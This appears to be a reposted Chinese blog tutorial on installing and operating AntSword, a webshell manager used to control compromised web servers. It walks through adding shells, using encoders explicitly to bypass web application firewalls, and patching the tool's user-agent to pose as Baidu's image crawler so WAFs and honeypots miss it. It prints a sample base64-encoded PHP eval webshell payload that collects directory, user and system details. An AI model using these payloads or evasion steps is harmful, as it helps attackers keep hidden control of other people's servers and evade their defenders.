中国蚁剑的下载、安装与使用
一、中國蟻劍下載、安裝
百度網盤鏈接:https://pan.baidu.com/s/1Fl0_hFtCtfUgcNIOwKeGEA
提取碼:nvjc
共包含2個文件:
antSword.zip
AntSword-Loader-v4.0.3-win32-x64.zip
由于我下載的是“AntSword-Loader-v4.0.3-win32-x64.zip”,我就以Windows版本64位來示例了。
1、我們解壓“AntSword-Loader-v4.0.3-win32-x64.zip”后,雙擊“AntSword.exe”;
第一次安裝項目需要先初始化,如果你已經下載了核心源碼,就選擇項目源碼的文件夾。(如果只下載了加載器,選擇一個空文件夾,加載器會自動幫你下載核心項目源碼)。
注意:這個項目文件夾就是你以后需要備份的,存儲著你的shell和shell內的資料。
2、等初始化完成后,再雙擊“AntSword.exe”即可正常啟動!
二、蟻劍的使用
1、添加一個shell
首先:右鍵單擊 - 添加數據;
其次:輸入URL地址,連接密碼以及編碼設置。PHP語言推薦編輯器使用chr加密;
再次:如果需要自己寫編碼器的加密類型,可以按下圖來操作:
還可以配置shell的請求信息和post內容;
最后:還可以配置全局代理;
2、插件
中國蟻劍有一個插件市場(ctrl+shift+p),可以安裝一些插件,插件有很多。以下是部份插件截圖:
3、關于編碼器
編碼器是這個程序的過人之處,用編碼器加密可以輕松繞過WAF。
不妨,我們來對比一下默認不使用編碼傳輸和base64編碼傳輸的區別:
base64編碼
明文傳輸,post內容為:
base64加密傳輸,post內容為:
_0x4ee8506e59871=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZWNobyAiNzk1ODAiOyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk/QHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk/JHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOztlY2hvICIwOWE3ZSI7ZGllKCk7&ant=@eval(@base64_decode($_POST[_0x4ee8506e59871]));注意:其中,ant參數名稱是shell密碼。
再來看看chr編碼傳輸,完全就全部編碼了。
4、user-agent修改
要注意的是,軟件默認的user-agent是:User-Agent: antSword/v2.0;而且大部分人都不會去自定義useragent,這就給waf和蜜罐白白送了一個特征,所以我們要修改一下源代碼:
修改項目路徑:
antSword\modules\request.js (修改const USER_AGENT = ‘antSword/v2.1’; 這一行代碼!)
antSword\modules\update.js (有兩處要修改;可搜索“antSword/v2.0”來找到這兩行代碼!)
我這里是把antSword/v2.0或antSword/v2.1修改為了Baiduspider-image,我改成了百度圖片蜘蛛;
如果大家還有什么不懂的,請查看中文說明書:https://doc.u0u.us/zh-hans/
參考博文:https://www.fujieace.com/hacker/tools/antsword.html
總結
以上是生活随笔為你收集整理的中国蚁剑的下载、安装与使用的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Hadoop下水环境模拟集群运算模式
- 下一篇: 【2017年第1期】ISO 8000(大